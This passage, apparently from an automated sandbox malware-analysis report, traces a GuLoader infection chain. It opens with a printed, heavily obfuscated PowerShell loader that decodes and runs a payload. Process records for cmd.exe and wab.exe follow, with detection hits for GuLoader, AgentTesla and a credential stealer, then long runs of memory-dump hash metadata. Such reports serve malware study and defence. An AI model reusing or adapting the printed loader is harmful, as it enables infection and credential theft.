AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. 
A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, 
Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
                                                        Imagebase:0xe60000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2007819028.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.2017391660.0000000009585000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:11:07:16
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
                                                        Imagebase:0xc50000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:11:07:42
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                        Imagebase:0xe30000
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _.BF$_.BF
                                                          • API String ID: 0-1703367604
                                                          • Opcode ID: e9b58df6a64b221e4f53a8180631a40f3614b0eb07b830ac9140b748fd8fed81
                                                          • Instruction ID: 296c07dd094313af914b3e48c47d9f9b3fe0375103a294b8b47b868bdcea73d3
                                                          • Opcode Fuzzy Hash: e9b58df6a64b221e4f53a8180631a40f3614b0eb07b830ac9140b748fd8fed81
                                                          • Instruction Fuzzy Hash: 15F1953091CA8E8FEBA8DF28C8557E937E1FF55350F14426AD84DC7291CB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _.BF$_.BF
                                                          • API String ID: 0-1703367604
                                                          • Opcode ID: 5d088fdf003e8cee3ea77c5af442024e25f76b59ecbf35b73c054ff95467f053
                                                          • Instruction ID: 17ec12f0efd437dbf8ac2988055bba046733fb3ed0b7255a9e24e4a3789c7887
                                                          • Opcode Fuzzy Hash: 5d088fdf003e8cee3ea77c5af442024e25f76b59ecbf35b73c054ff95467f053
                                                          • Instruction Fuzzy Hash: 5CE1C130908A8E8FEBA8DF28C8557F937E1FF54750F14426AD84DC7291DA78A945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05afe30eb6d7e5586ac9238e4d920caae5f62021a2ee7203f39a38250bf0ffe6
                                                          • Instruction ID: 308f7adec88457b173bbae05522908ae8f143171b6fa1be3f686c0188134d55d
                                                          • Opcode Fuzzy Hash: 05afe30eb6d7e5586ac9238e4d920caae5f62021a2ee7203f39a38250bf0ffe6
                                                          • Instruction Fuzzy Hash: 6DE11431D0DA8E8FE796DB6848556B87BE1FF963A0F1802BAC44DC71D2DA18EC46C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f78c9977b1553920cd027551657a42b05caf0423584b33d7ae29a0e3541b564
                                                          • Instruction ID: 3a5e0492b2d5af366bf618b5f76f790030f2bcc5a964c29dac2fb6bef2c030e9
                                                          • Opcode Fuzzy Hash: 0f78c9977b1553920cd027551657a42b05caf0423584b33d7ae29a0e3541b564
                                                          • Instruction Fuzzy Hash: B0B1E2B1E0DA8E4FE797DA6C58646B57BE2FF593A4B4801BAC00DC7192DA28DC05C341
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a9a2baa8d1d2cd2f2ef10380a8e3d12bf76eab9bf72ced170f4196ae611c6fa
                                                          • Instruction ID: 14ab999b8c3850a1f544c51a27c4e6dce5d43dd4e942e53c554cfdf60ee37a89
                                                          • Opcode Fuzzy Hash: 1a9a2baa8d1d2cd2f2ef10380a8e3d12bf76eab9bf72ced170f4196ae611c6fa
                                                          • Instruction Fuzzy Hash: B9612470A1CA494FE749EB28C495BB5B7E1FF95390F20057DD08AC7297DA25F842CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41dba8cde32e9df6118b59f504c44f0d0dbbf6c4e00c9b58ec8bed745e487df6
                                                          • Instruction ID: c6cd07f78d03e5145cd902d7da740c12f8fd5ae07bf74c02beff7e46167a7288
                                                          • Opcode Fuzzy Hash: 41dba8cde32e9df6118b59f504c44f0d0dbbf6c4e00c9b58ec8bed745e487df6
                                                          • Instruction Fuzzy Hash: 1951B322D1DA8A8FE396DB6854516B8A6E2BF953E4F5801B9D40CC31D2DD1CEC46D702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d599f8fa334c4287863cefbde9ec738b4473e47f083d1469485a8fd50c1a990d
                                                          • Instruction ID: 0c7cb62399094539e6a7888529cc61daf6d22f07711acdee1b5695f84bad4030
                                                          • Opcode Fuzzy Hash: d599f8fa334c4287863cefbde9ec738b4473e47f083d1469485a8fd50c1a990d
                                                          • Instruction Fuzzy Hash: 9E31D892D1EA8B0BE3A796AC28211B86AD1FF557E5B5801BAC40DC31D3ED1CDC148342
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction ID: be3fd98d75d27ec4b1f607558638be3019c5f8a5eb3205554f58c07053ce29c0
                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction Fuzzy Hash: FB01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3655DA36E881CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 945dc2c5d1f30d8e401a169cc48eceba9a2ba6d637bd1e1cbb5c0c9539963942
                                                          • Instruction ID: cb0e2562d308a3b65abfd14df562dcb65dbbb023c997bb620362146bbe67b733
                                                          • Opcode Fuzzy Hash: 945dc2c5d1f30d8e401a169cc48eceba9a2ba6d637bd1e1cbb5c0c9539963942
                                                          • Instruction Fuzzy Hash: E65104B0A093C5EFD3128B64C814BA6BFF1EF86211F19C0DAD0559F2A2C636DC45D7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                          • API String ID: 0-747792303
                                                          • Opcode ID: ad3700a73c60715419eb3e4ff594450b6f18ee884fb5945a807c34d09fe2eff7
                                                          • Instruction ID: dbacf9bc175174d1a6fd605a1e4a154ea7d1d6162d328e921f7a5288e952978a
                                                          • Opcode Fuzzy Hash: ad3700a73c60715419eb3e4ff594450b6f18ee884fb5945a807c34d09fe2eff7
                                                          • Instruction Fuzzy Hash: B49290B0B00305DFEB24DB68C880BAAB7B2EF85314F1484AAD815AF751DB71DC91CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                          • API String ID: 0-747792303
                                                          • Opcode ID: 753babe19d53b33cc744deae3c67ffa0314296bc482542404bf356385dc8de6d
                                                          • Instruction ID: 3181ed47a01731ba177f7c5cbc5e84ac7ada67f0f18edb8a7b01166796e951c6
                                                          • Opcode Fuzzy Hash: 753babe19d53b33cc744deae3c67ffa0314296bc482542404bf356385dc8de6d
                                                          • Instruction Fuzzy Hash: F5827CB4B00205DFEB24CB98C840B6ABBB2EF85315F25C4A9D8159F755DB71EC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl$(fl
                                                          • API String ID: 0-3144609269
                                                          • Opcode ID: 988476df788284667fc4c3ff527ea865bc652c069c85b31d350569a3e7f8a543
                                                          • Instruction ID: 16fba95d707db5b39a4f6e1106670116b3cf94042cd4b23b97b3697cc401d202
                                                          • Opcode Fuzzy Hash: 988476df788284667fc4c3ff527ea865bc652c069c85b31d350569a3e7f8a543
                                                          • Instruction Fuzzy Hash: DA1269B4A00205DFEB24CB98C580F59BBB2EF85315F25C4A9E925AF755DB72EC41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 18fd248844398df305d42e2169dcb6a244cd5773ad8d1e73adac4ad9f2ce9448
                                                          • Instruction ID: 1c6d2889a6d8f760e8a41c0f89247f9bf622e695647a0c89611dcd141793ea22
                                                          • Opcode Fuzzy Hash: 18fd248844398df305d42e2169dcb6a244cd5773ad8d1e73adac4ad9f2ce9448
                                                          • Instruction Fuzzy Hash: 0C12AEF5B00205DFEB14CB68C454BAABBB2EF89210F2580EAD815AF751DB71DD41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 04e14782f007f4751169c88369d3cca23842a37a14d8e4c242049fcc1d6b8eb6
                                                          • Instruction ID: 7b37ebea1b5726e48e6dd2782ff9d6991e88fb51b5562cca29665a3342a31855
                                                          • Opcode Fuzzy Hash: 04e14782f007f4751169c88369d3cca23842a37a14d8e4c242049fcc1d6b8eb6
                                                          • Instruction Fuzzy Hash: FF023AB4A002199FE724DB28C990BDEB7B2AF85304F1085E6D9096F741DB75AEC1CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: 9a81558981e6620f9e197fdc496493e166c1d29ec7a0f77921d2422749ac0f17
                                                          • Instruction ID: 01a757a526269bdf06394bb3e7303b22d302cce1cdc06fb08419cdc4b1fff97d
                                                          • Opcode Fuzzy Hash: 9a81558981e6620f9e197fdc496493e166c1d29ec7a0f77921d2422749ac0f17
                                                          • Instruction Fuzzy Hash: FFF16BB4B003159FEB24DB28C851B5AB7B2AF89304F10C4E9D9096F791DB75ED81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl$(fl
                                                          • API String ID: 0-1194790885
                                                          • Opcode ID: c0c713441b8c6aba9b7b4123df758fceb872c5bc222cff5343e9150bf105d2b1
                                                          • Instruction ID: 5ea56009b42109ac1cff03579d7c3bd20de323572c1f0c629d877c31554bf653
                                                          • Opcode Fuzzy Hash: c0c713441b8c6aba9b7b4123df758fceb872c5bc222cff5343e9150bf105d2b1
                                                          • Instruction Fuzzy Hash: B3919EF4B00304ABE714DB68C545B9AB7F2EF89314F2480A9E9016F791DB76EC51CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: 4aa95afd24610276c091005a8721d477d2b20ecaf84d242ec57e98dbdf24027f
                                                          • Instruction ID: b3889cab4d0350da4652bef6346e818e010fb1a3f3fefe17735bf51c37d4e324
                                                          • Opcode Fuzzy Hash: 4aa95afd24610276c091005a8721d477d2b20ecaf84d242ec57e98dbdf24027f
                                                          • Instruction Fuzzy Hash: 49E1AEB4B003149FE714EB68C894B9EB7B2AF85304F1184A9D9096F391DB75EE81CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: 55d41c637ffa655f929820fb115e03a5598d07114b6c7a745202060ab8ec5082
                                                          • Instruction ID: 537e1e29356feb01c9ad210f902be01731810e9e31f06797dd6e25db502605f7
                                                          • Opcode Fuzzy Hash: 55d41c637ffa655f929820fb115e03a5598d07114b6c7a745202060ab8ec5082
                                                          • Instruction Fuzzy Hash: 1D917CB4B00304AFE714DB68C584B9AB7B2EF89314F258099E9016F791DB76EC90CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          • Opcode ID: fa1b01fa18394f3b8049366410bf4da046ff31beeb646c655def4627f958e7d4
                                                          • Instruction ID: dc435441506dad3f2ad9519ee862a2a60b17f30f77abd5e05d537d79288dde05
                                                          • Opcode Fuzzy Hash: fa1b01fa18394f3b8049366410bf4da046ff31beeb646c655def4627f958e7d4
                                                          • Instruction Fuzzy Hash: F48127B4A00205DFEB14CF58C594AA9BBB2EF89314F19C0D9E815AB751DB72E841CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fl
                                                          • API String ID: 0-423539152
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2012928882.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_7b70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
